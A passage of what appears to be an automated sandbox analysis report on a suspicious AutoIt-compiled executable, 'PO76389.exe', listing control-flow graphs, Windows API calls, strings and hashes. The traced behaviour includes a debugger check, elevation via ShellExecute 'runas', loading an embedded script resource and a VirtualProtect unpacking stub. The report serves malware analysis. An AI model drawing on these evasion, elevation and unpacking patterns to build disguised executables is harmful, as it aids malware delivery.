105751->105742 105754 4d010a 48 API calls 105752->105754 105755 524b49 105754->105755 105756 4b4bce 48 API calls 105755->105756 105757 524b53 RegQueryValueExW 105756->105757 105758 524b6f 105757->105758 105760 524b86 105757->105760 105759 4b7e53 48 API calls 105758->105759 105759->105760 105760->105753 105762 4daaca 105761->105762 105763 4dabc6 105761->105763 105762->105763 105766 4daad5 105762->105766 105771 4d889e 47 API calls __getptd_noexit 105763->105771 105765 4dabbb 105772 4d7aa0 8 API calls __cftoe2_l 105765->105772 105769 4cea8a 105766->105769 105770 4d889e 47 API calls __getptd_noexit 105766->105770 105769->105734 105770->105765 105771->105765 105772->105769 105774 4bc4da 105773->105774 105775 4bc4e7 105773->105775 105774->105749 105776 4d010a 48 API calls 105775->105776 105776->105774

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                      • Part of subcall function 004B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                    • IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO76389.exe,00000104,?,00571120,C:\Users\user\Desktop\PO76389.exe,00571124,?,?), ref: 004B37EE
                                                      • Part of subcall function 004B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004B352A
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00562934,00000010), ref: 005221C5
                                                    • SetCurrentDirectoryW.KERNEL32(?,?), ref: 005221FD
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00522232
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0054DAA4), ref: 00522290
                                                    • ShellExecuteW.SHELL32(00000000), ref: 00522297
                                                      • Part of subcall function 004B30A5: GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                      • Part of subcall function 004B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(00000063), ref: 004B30D5
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(000000A4), ref: 004B30E7
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(000000A2), ref: 004B30F9
                                                      • Part of subcall function 004B30A5: RegisterClassExW.USER32(?), ref: 004B3167
                                                      • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                      • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                      • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F00
                                                      • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F09
                                                      • Part of subcall function 004B3598: _memset.LIBCMT ref: 004B35BE
                                                      • Part of subcall function 004B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                    • String ID: C:\Users\user\Desktop\PO76389.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"W
                                                    • API String ID: 4253510256-3064423846
                                                    • Opcode ID: 0e3d49c8da579bd5669c296ce4e0ca64e7ba7ca038b7ed5fb4d1094fc0ac9a82
                                                    • Instruction ID: 883924b4ebd2404bbc56d33ff6c485ab78a2a58faf97bb5c1a184cd201498bb8
                                                    • Opcode Fuzzy Hash: 0e3d49c8da579bd5669c296ce4e0ca64e7ba7ca038b7ed5fb4d1094fc0ac9a82
                                                    • Instruction Fuzzy Hash: 8A512D74604144BBCB10BFA6BC46FED3FB4AB25705F00005BF64596191CA744A89FB7E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 698 4dbdf6-4dbe33 call 4e0650 701 4dbe3c-4dbe3e 698->701 702 4dbe35-4dbe37 698->702 704 4dbe5f-4dbe8c 701->704 705 4dbe40-4dbe5a call 4d886a call 4d889e call 4d7aa0 701->705 703 4dc613-4dc61f call 4db4bf 702->703 708 4dbe8e-4dbe91 704->708 709 4dbe93-4dbe9a 704->709 705->703 708->709 714 4dbebe-4dbec3 708->714 710 4dbe9c-4dbeb3 call 4d886a call 4d889e call 4d7aa0 709->710 711 4dbeb8 709->711 744 4dc604-4dc607 710->744 711->714 717 4dbec5-4dbecf call 4e05df 714->717 718 4dbed2-4dbee0 call 4e49a2 714->718 717->718 729 4dc1fe-4dc210 718->729 730 4dbee6-4dbef8 718->730 732 4dc56b-4dc588 WriteFile 729->732 733 4dc216-4dc226 729->733 730->729 731 4dbefe-4dbf36 call 4d869d GetConsoleMode 730->731 731->729 749 4dbf3c-4dbf42 731->749 739 4dc58a-4dc592 732->739 740 4dc594-4dc59a GetLastError 732->740 736 4dc30d-4dc312 733->736 737 4dc22c-4dc237 733->737 746 4dc318-4dc321 736->746 747 4dc416-4dc421 736->747 742 4dc23d-4dc24d 737->742 743 4dc5ce-4dc5e6 737->743 745 4dc59c 739->745 740->745 750 4dc253-4dc256 742->750 751 4dc5e8-4dc5eb 743->751 752 4dc5f1-4dc601 call 4d889e call 4d886a 743->752 748 4dc611-4dc612 744->748 754 4dc5a2-4dc5a4 745->754 746->743 755 4dc327 746->755 747->743 753 4dc427 747->753 748->703 757 4dbf4c-4dbf6f GetConsoleCP 749->757 758 4dbf44-4dbf46 749->758 759 4dc29c-4dc2d3 WriteFile 750->759 760 4dc258-4dc271 750->760 751->752 761 4dc5ed-4dc5ef 751->761 752->744 762 4dc431-4dc446 753->762 764 4dc609-4dc60f 754->764 765 4dc5a6-4dc5a8 754->765 756 4dc331-4dc348 755->756 766 4dc34e-4dc351 756->766 767 4dbf75-4dbf7d 757->767 768 4dc1f3-4dc1f9 757->768 758->729 758->757 759->740 771 4dc2d9-4dc2eb 759->771 769 4dc27e-4dc29a 760->769 770 4dc273-4dc27d 760->770 761->748 772 4dc44c-4dc44e 762->772 764->748 765->743 774 4dc5aa-4dc5af 765->774 777 4dc391-4dc3da WriteFile 766->777 778 4dc353-4dc369 766->778 779 4dbf87-4dbf89 767->779 768->765 769->750 769->759 770->769 771->754 780 4dc2f1-4dc302 771->780 781 4dc48b-4dc4cc WideCharToMultiByte 772->781 782 4dc450-4dc466 772->782 775 4dc5c5-4dc5cc call 4d887d 774->775 776 4dc5b1-4dc5c3 call 4d889e call 4d886a 774->776 775->744 776->744 777->740 789 4dc3e0-4dc3f8 777->789 786 4dc36b-4dc37d 778->786 787 4dc380-4dc38f 778->787 790 4dbf8f-4dbfb1 779->790 791 4dc11e-4dc121 779->791 780->742 792 4dc308 780->792 781->740 785 4dc4d2-4dc4d4 781->785 793 4dc468-4dc477 782->793 794 4dc47a-4dc489 782->794 797 4dc4da-4dc50d WriteFile 785->797 786->787 787->766 787->777 789->754 799 4dc3fe-4dc40b 789->799 800 4dbfca-4dbfd6 call 4d22a8 790->800 801 4dbfb3-4dbfc8 790->801 802 4dc128-4dc155 791->802 803 4dc123-4dc126 791->803 792->754 793->794 794->772 794->781 806 4dc52d-4dc541 GetLastError 797->806 807 4dc50f-4dc529 797->807 799->756 808 4dc411 799->808 822 4dc01c-4dc01e 800->822 823 4dbfd8-4dbfec 800->823 809 4dc024-4dc036 call 4e4ea7 801->809 804 4dc15b-4dc15e 802->804 803->802 803->804 811 4dc165-4dc178 call 4e6634 804->811 812 4dc160-4dc163 804->812 816 4dc547-4dc549 806->816 807->797 814 4dc52b 807->814 808->754 825 4dc03c 809->825 826 4dc1e8-4dc1ee 809->826 811->740 831 4dc17e-4dc188 811->831 812->811 818 4dc1ba-4dc1bd 812->818 814->816 816->745 821 4dc54b-4dc563 816->821 818->779 828 4dc1c3 818->828 821->762 827 4dc569 821->827 822->809 829 4dc1c5-4dc1e0 823->829 830 4dbff2-4dc007 call 4e4ea7 823->830 832 4dc042-4dc077 WideCharToMultiByte 825->832 826->745 827->754 828->826 829->826 830->826 838 4dc00d-4dc01a 830->838 835 4dc1ae-4dc1b4 831->835 836 4dc18a-4dc1a1 call 4e6634 831->836 832->826 837 4dc07d-4dc0a3 WriteFile 832->837 835->818 836->740 843 4dc1a7-4dc1a8 836->843 837->740 840 4dc0a9-4dc0c1 837->840 838->832 840->826 842 4dc0c7-4dc0ce 840->842 842->835 844 4dc0d4-4dc0ff WriteFile 842->844 843->835 844->740 845 4dc105-4dc10c 844->845 845->826 846 4dc112-4dc119 845->846 846->835
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                    • Instruction ID: 708574b9cb43b7ea98e4247dfcf171224f1f35f5604fe1408835e78ef4203872
                                                    • Opcode Fuzzy Hash: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                    • Instruction Fuzzy Hash: B8325B75A022298FDB248F19DDA06EAB7B5FB46310F0440DBE40AE7B81D7349E80DF56

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1088 4b29c2-4b29e2 1090 4b2a42-4b2a44 1088->1090 1091 4b29e4-4b29e7 1088->1091 1090->1091 1092 4b2a46 1090->1092 1093 4b29e9-4b29f0 1091->1093 1094 4b2a48 1091->1094 1097 4b2a2b-4b2a33 NtdllDefWindowProc_W 1092->1097 1095 4b2aac-4b2ab4 PostQuitMessage 1093->1095 1096 4b29f6-4b29fb 1093->1096 1098 522307-522335 call 4b322e call 4cec33 1094->1098 1099 4b2a4e-4b2a51 1094->1099 1103 4b2a72-4b2a74 1095->1103 1101 4b2a01-4b2a03 1096->1101 1102 52238f-5223a3 call 4f57fb 1096->1102 1104 4b2a39-4b2a3f 1097->1104 1132 52233a-522341 1098->1132 1105 4b2a53-4b2a54 1099->1105 1106 4b2a76-4b2a9d SetTimer RegisterClipboardFormatW 1099->1106 1108 4b2a09-4b2a0e 1101->1108 1109 4b2ab6-4b2ac5 call 4b1e58 1101->1109 1102->1103 1125 5223a9 1102->1125 1103->1104 1112 4b2a5a-4b2a6d KillTimer call 4b2b94 call 4b2ac7 1105->1112 1113 5222aa-5222ad 1105->1113 1106->1103 1110 4b2a9f-4b2aaa CreatePopupMenu 1106->1110 1115 522374-52237b 1108->1115 1116 4b2a14-4b2a19 1108->1116 1109->1103 1110->1103 1112->1103 1119 5222e3-522302 MoveWindow 1113->1119 1120 5222af-5222b1 1113->1120 1115->1097 1130 522381-52238a call 4eb31f 1115->1130 1123 4b2a1f-4b2a25 1116->1123 1124 52235f-52236f call 4f5fdb 1116->1124 1119->1103 1127 5222d2-5222de SetFocus 1120->1127 1128 5222b3-5222b6 1120->1128 1123->1097 1123->1132 1124->1103 1125->1097 1127->1103 1128->1123 1133 5222bc-5222cd call 4b322e 1128->1133 1130->1097 1132->1097 1137 522347-52235a call 4b2b94 call 4b3598 1132->1137 1133->1103 1137->1097
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 004B2A33
                                                    • KillTimer.USER32(?,00000001), ref: 004B2A5D
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B2A80
                                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2A8B
                                                    • CreatePopupMenu.USER32 ref: 004B2A9F
                                                    • PostQuitMessage.USER32(00000000), ref: 004B2AAE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 157504867-2362178303
                                                    • Opcode ID: 167dc519e3f37d13f8dff695cabac1e869c5aab0eaca877dea5b7cd7bb0c2470
                                                    • Instruction ID: 7fc9df72a45f0e624aa9d9168a8ec06a6b876e3cd71d400decc1718435494a3f
                                                    • Opcode Fuzzy Hash: 167dc519e3f37d13f8dff695cabac1e869c5aab0eaca877dea5b7cd7bb0c2470
                                                    • Instruction Fuzzy Hash: 90413130200545ABDB34AF6CBE09BFA3669F729340F00451BF515922E1DAAC5C95B77E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1313 4ce47b-4ce50a call 4bd3d2 GetVersionExW call 4b7e53 call 4ce5f8 call 4ce617 1322 5229f9-5229fc 1313->1322 1323 4ce510-4ce511 1313->1323 1324 522a15-522a19 1322->1324 1325 5229fe 1322->1325 1326 4ce54d-4ce55d call 4ce6d1 1323->1326 1327 4ce513-4ce51e 1323->1327 1329 522a04-522a0d 1324->1329 1330 522a1b-522a24 1324->1330 1328 522a01 1325->1328 1340 4ce55f-4ce57c GetCurrentProcess call 4ce70e 1326->1340 1341 4ce582-4ce59c 1326->1341 1331 4ce524-4ce526 1327->1331 1332 52297f-522985 1327->1332 1328->1329 1329->1324 1330->1328 1336 522a26-522a29 1330->1336 1337 4ce52c-4ce52f 1331->1337 1338 52299a-5229a6 1331->1338 1334 522987-52298a 1332->1334 1335 52298f-522995 1332->1335 1334->1326 1335->1326 1336->1329 1344 5229c6-5229c9 1337->1344 1345 4ce535-4ce544 1337->1345 1342 5229b0-5229b6 1338->1342 1343 5229a8-5229ab 1338->1343 1340->1341 1364 4ce57e 1340->1364 1347 4ce5ec-4ce5f6 GetSystemInfo 1341->1347 1348 4ce59e-4ce5b2 call 4ce694 1341->1348 1342->1326 1343->1326 1344->1326 1349 5229cf-5229e4 1344->1349 1350 4ce54a 1345->1350 1351 5229bb-5229c1 1345->1351 1353 4ce5c9-4ce5d5 1347->1353 1361 4ce5e4-4ce5ea GetSystemInfo 1348->1361 1362 4ce5b4-4ce5bc call 4ce437 GetNativeSystemInfo 1348->1362 1355 5229e6-5229e9 1349->1355 1356 5229ee-5229f4 1349->1356 1350->1326 1351->1326 1357 4ce5dc-4ce5e1 1353->1357 1358 4ce5d7-4ce5da FreeLibrary 1353->1358 1355->1326 1356->1326 1358->1357 1363 4ce5be-4ce5c2 1361->1363 1362->1363 1363->1353 1367 4ce5c4-4ce5c7 FreeLibrary 1363->1367 1364->1341 1367->1353
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 004CE4A7
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • GetCurrentProcess.KERNEL32(00000000,0054DC28,?,?), ref: 004CE567
                                                    • GetNativeSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5BC
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5C7
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5DA
                                                    • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5E4
                                                    • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                    • String ID:
                                                    • API String ID: 2717633055-0
                                                    • Opcode ID: a29061d02b635141b6404f8a65c602226cec0a6131356d353b315b696315c598
                                                    • Instruction ID: d77789f1447a35d79beb2211e69d2310d5f00f4eefd23fd8c65d3bffe5b1823f
                                                    • Opcode Fuzzy Hash: a29061d02b635141b6404f8a65c602226cec0a6131356d353b315b696315c598
                                                    • Instruction Fuzzy Hash: 0261F1B5809290EBCF15CFA998C06E97FB46F2A304F1845DED8449B347D728C949CB2A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1385 4b31f2-4b320a CreateStreamOnHGlobal 1386 4b322a-4b322d 1385->1386 1387 4b320c-4b3223 FindResourceExW 1385->1387 1388 5257d3-5257e2 LoadResource 1387->1388 1389 4b3229 1387->1389 1388->1389 1390 5257e8-5257f6 SizeofResource 1388->1390 1389->1386 1390->1389 1391 5257fc-525807 LockResource 1390->1391 1391->1389 1392 52580d-525815 1391->1392 1393 525819-52582b 1392->1393 1393->1389
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004B3202
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 004B3219
                                                    • LoadResource.KERNEL32(?,00000000), ref: 005257D7
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 005257EC
                                                    • LockResource.KERNEL32(?), ref: 005257FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                    • Instruction ID: 85ba8ee9e22b84a81c83e00aca906ea829c43fa5b11b258444ac988d1c55c40e
                                                    • Opcode Fuzzy Hash: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                    • Instruction Fuzzy Hash: 84117974200701BFEB258F66FC4AF677BB9EBC9B42F208469F40296290DB71DD049A70
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 005EB1CA
                                                    • GetProcAddress.KERNEL32(?,005E4FF9), ref: 005EB1E8
                                                    • ExitProcess.KERNEL32(?,005E4FF9), ref: 005EB1F9
                                                    • VirtualProtect.KERNEL32(004B0000,00001000,00000004,?,00000000), ref: 005EB247
                                                    • VirtualProtect.KERNEL32(004B0000,00001000), ref: 005EB25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                    • String ID:
                                                    • API String ID: 1996367037-0
                                                    • Opcode ID: c7dc20cb1284afce3b4b7a026ead05358fc87aaf93e70ccc72ee03ac72abfe20
                                                    • Instruction ID: 68a8ce97f1434f56ce02bf239929420db7150a834357713ce21dd9d88a222cda
                                                    • Opcode Fuzzy Hash: c7dc20cb1284afce3b4b7a026ead05358fc87aaf93e70ccc72ee03ac72abfe20
                                                    • Instruction Fuzzy Hash: E651F572A543925BE72D9AB9CCD46677FA0FB51332B180B39C6E1C73C6E7906805C7A0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(004BC848,004BC848), ref: 004CDDA2
                                                    • FindFirstFileW.KERNEL32(004BC848,?), ref: 00524A83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesFindFirst
                                                    • String ID:
                                                    • API String ID: 4185537391-0
                                                    • Opcode ID: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                    • Instruction ID: bff4dc4306f6731882c783e2631efd6a385da51ec33d4cc740d4dc8f3d4b0b1f
                                                    • Opcode Fuzzy Hash: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                    • Instruction Fuzzy Hash: 1CE0D8318144116742146738FC4D8EE7B7D9E06338B10071AF836C21E0E7749D55D9FA
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                    • timeGetTime.WINMM ref: 004BE51A
                                                    • TranslateMessage.USER32(?), ref: 004BE646
                                                    • DispatchMessageW.USER32(?), ref: 004BE651
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                    • LockWindowUpdate.USER32(00000000), ref: 004BE697
                                                    • DestroyWindow.USER32 ref: 004BE6A3
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004BE6BD
                                                    • Sleep.KERNEL32(0000000A), ref: 00525B15
                                                    • TranslateMessage.USER32(?), ref: 005262AF
                                                    • DispatchMessageW.USER32(?), ref: 005262BD
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005262D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 2641332412-570651680
                                                    • Opcode ID: 5bb19eea276869836c2ab51644f807f9c9969321e56d5001faa8a9b42c6a227a
                                                    • Instruction ID: 317cae6480f19941134a8b6f02341eabd4f0fa9d860d4c34ffab7ac9e1c5ddfb
                                                    • Opcode Fuzzy Hash: 5bb19eea276869836c2ab51644f807f9c9969321e56d5001faa8a9b42c6a227a
                                                    • Instruction Fuzzy Hash: E3621170504340DFDB24DF25D885BEA7BE4BF85308F04496EF94A8B292DB78D848DB66
                                                    APIs
                                                    • ___createFile.LIBCMT ref: 004E6C73
                                                    • ___createFile.LIBCMT ref: 004E6CB4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6CDD
                                                    • __dosmaperr.LIBCMT ref: 004E6CE4
                                                    • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6CF7
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6D1A
                                                    • __dosmaperr.LIBCMT ref: 004E6D23
